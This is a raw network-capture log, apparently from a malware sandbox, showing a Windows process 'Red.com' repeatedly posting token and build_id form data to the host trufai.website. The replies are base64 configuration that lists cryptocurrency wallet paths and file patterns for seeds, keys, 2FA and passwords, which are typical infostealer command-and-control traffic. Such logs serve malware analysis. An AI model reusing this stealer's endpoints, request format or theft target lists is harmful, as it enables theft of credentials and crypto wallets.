2025-01-03 13:30:59 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 70 7a 75 6b 36 78 34 6f 68 76 73 32 76 61 31 6e 6f 38 67 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 70 7a 75 6b 36 78 34 6f 68 76 73 32 76 61 31 6e 6f 38 67 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 70 7a 75 6b 36 78 34 6f 68 76 73 32 76 61 31 6e 6f 38 67 6c 0d 0a 43 6f 6e 74 Data Ascii: ------pzuk6x4ohvs2va1no8glContent-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------pzuk6x4ohvs2va1no8glContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------pzuk6x4ohvs2va1no8glCont
2025-01-03 13:30:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:31:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:31:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49817	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:31:01 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----vaim7glfcbie3eus00hl User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:31:01 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 76 61 69 6d 37 67 6c 66 63 62 69 65 33 65 75 73 30 30 68 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 76 61 69 6d 37 67 6c 66 63 62 69 65 33 65 75 73 30 30 68 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 76 61 69 6d 37 67 6c 66 63 62 69 65 33 65 75 73 30 30 68 6c 0d 0a 43 6f 6e 74 Data Ascii: ------vaim7glfcbie3eus00hlContent-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------vaim7glfcbie3eus00hlContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------vaim7glfcbie3eus00hlCont
2025-01-03 13:31:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:31:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:31:02 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49828	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:31:02 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ln7qqqq90r90rq1d2vkx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:31:02 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 6c 6e 37 71 71 71 71 39 30 72 39 30 72 71 31 64 32 76 6b 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 6c 6e 37 71 71 71 71 39 30 72 39 30 72 71 31 64 32 76 6b 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6c 6e 37 71 71 71 71 39 30 72 39 30 72 71 31 64 32 76 6b 78 0d 0a 43 6f 6e 74 Data Ascii: ------ln7qqqq90r90rq1d2vkxContent-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------ln7qqqq90r90rq1d2vkxContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------ln7qqqq90r90rq1d2vkxCont
2025-01-03 13:31:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:31:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:31:03 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49839	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:31:04 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----2vs26f3eua1v3790hvas User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:31:04 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 76 73 32 36 66 33 65 75 61 31 76 33 37 39 30 68 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 32 76 73 32 36 66 33 65 75 61 31 76 33 37 39 30 68 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 32 76 73 32 36 66 33 65 75 61 31 76 33 37 39 30 68 76 61 73 0d 0a 43 6f 6e 74 Data Ascii: ------2vs26f3eua1v3790hvasContent-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------2vs26f3eua1v3790hvasContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------2vs26f3eua1v3790hvasCont
2025-01-03 13:31:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:31:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:31:05 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49874	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:31:09 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----mophlxlng4o8qiwt2noz User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:31:09 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 6d 6f 70 68 6c 78 6c 6e 67 34 6f 38 71 69 77 74 32 6e 6f 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 6d 6f 70 68 6c 78 6c 6e 67 34 6f 38 71 69 77 74 32 6e 6f 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6d 6f 70 68 6c 78 6c 6e 67 34 6f 38 71 69 77 74 32 6e 6f 7a 0d 0a 43 6f 6e 74 Data Ascii: ------mophlxlng4o8qiwt2nozContent-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------mophlxlng4o8qiwt2nozContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------mophlxlng4o8qiwt2nozCont
2025-01-03 13:31:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:31:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:31:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49881	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:31:10 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----8ym7yus0z5fcjmy589hd User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
